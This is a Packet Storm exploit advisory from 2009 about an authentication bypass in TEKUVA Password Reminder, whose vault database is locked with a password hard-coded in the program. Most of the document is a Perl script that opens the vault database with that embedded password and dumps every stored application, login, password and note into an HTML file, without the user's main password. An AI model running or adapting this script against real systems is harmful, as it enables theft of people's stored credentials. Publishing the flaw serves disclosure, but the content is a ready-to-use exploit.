TEKUVA Authentication Bypass

Type packetstorm
Reporter iqlusion
Modified 2009-12-03T00:00:00


# Exploit: TEKUVA Password Reminder Authentication Bypass  
# Date: [11/19/2009]  
# Author: iqlusion [x+nospam@iqlusion.net]  
# Software Link: http://download.cnet.com/Password-Reminder/3000-2064_4-10966598.html  
# Version:  
# Info: TEKUVA Password Reminder is a password vault that allows you to store all  
# your credentials in one spot and all you have to remember is a single 'main'  
# password to access your vault. Unfortunately, the vault is actually an   
# Access 2007 database that is protected by a password which is hard coded into  
# the program, not your main password.  
# This script connects to the database using the hard coded db password and dumps  
# everything into an HTML table, bypassing the need to enter the main vault  
# password (or use the program at all for that matter). Modify values as needed.  
# Greetz: quetzal : w00tb0t : sck  
use DBI;  
$DBFile = "C:\\Program Files\\TEKUVA\\Password_Reminder\\dtb\\rem.accdb";  
$sql = "SELECT app,lgn,pwd,nts FROM pwdrem WHERE idn IS NOT NULL";  
$DSN = "DRIVER=Microsoft Access Driver (*.mdb, *.accdb);dbq=$DBFile;pwd=P\@z19r1m";  
$dbh = DBI->connect("dbi:ODBC:$DSN")||die print $DBI::errstr;  
$qry = $dbh->prepare($sql);  
open(PWD,">results.html") || die print $!;  
print PWD "<table border=1><thead><tr><td>Application/URL</td><td>Login</td><td>Password</td><td>Notes:</td></tr></thead>\n";  
while(my($app,$lgn,$pwd,$nts) = $qry->fetchrow_array()){print PWD "<tr><td>$app</td><td>$lgn</td><td>$pwd</td><td>$nts</td></tr>\n";}  
print PWD "</table></html>";  
print "Passwords dumped to results.html\n\n";